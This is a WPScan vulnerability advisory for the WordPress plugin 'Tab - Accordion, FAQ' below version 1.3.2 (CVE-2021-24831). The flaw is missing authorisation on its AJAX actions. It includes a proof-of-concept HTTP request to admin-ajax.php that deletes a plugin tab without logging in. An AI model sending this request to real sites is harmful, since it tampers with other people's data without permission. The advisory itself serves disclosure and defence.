WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Tab - Accordion, FAQ < 1.3.2 - Unauthenticated AJAX Calls

Description

All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs.

v1.3.0 added CSRF checks, however authorisation was still missing and has been added in 1.3.2

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close

action=RW_Tabs_Man_Delete_Opt&Deleted_ID=4

Affects Plugins

tabbed
Fixed in version 1.3.2

References

CVE
CVE-2021-24831

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
75ed9f5f-e091-4372-a6cb-57958ad5f900

Timeline

Publicly Published

2021-12-06 (about 1 years ago)

Added

2021-12-06 (about 1 years ago)

Last Updated

2022-04-11 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin